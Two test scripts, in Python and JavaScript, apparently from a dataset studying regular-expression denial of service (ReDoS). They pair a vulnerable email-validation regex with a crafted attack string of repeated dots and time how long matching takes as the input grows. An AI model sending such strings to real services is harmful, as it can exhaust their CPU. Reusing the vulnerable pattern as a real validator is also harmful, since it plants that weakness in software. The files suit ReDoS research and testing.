File: regexlib/2021-5-15/python_re_test_file/regexlib_7255.py
# 7255
# ^(\D)+(\w)*((\.(\w)+)?)+@(\D)+(\w)*((\.(\D)+(\w)*)+)?(\.)[a-z]{2,}$
# EXPONENT
# nums:4
# EXPONENT AttackString:"@@@"+"."*32+"◎1 __EOA(iv)"

import re
from time import perf_counter

regex = """^(\D)+(\w)*((\.(\w)+)?)+@(\D)+(\w)*((\.(\D)+(\w)*)+)?(\.)[a-z]{2,}$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "@@@" + "." * i * 1 + "◎1 __EOA(iv)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_7255.js
/* 7255
 * ^(\D)+(\w)*((\.(\w)+)?)+@(\D)+(\w)*((\.(\D)+(\w)*)+)?(\.)[a-z]{2,}$
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:"@@@"+"."*32+"◎1 __EOA(iv)"
 */
var REGEX = /^(\D)+(\w)*((\.(\w)+)?)+@(\D)+(\w)*((\.(\D)+(\w)*)+)?(\.)[a-z]{2,}$/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '@@@' + '.'.repeat(i*1) + '◎1 __EOA(iv)'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}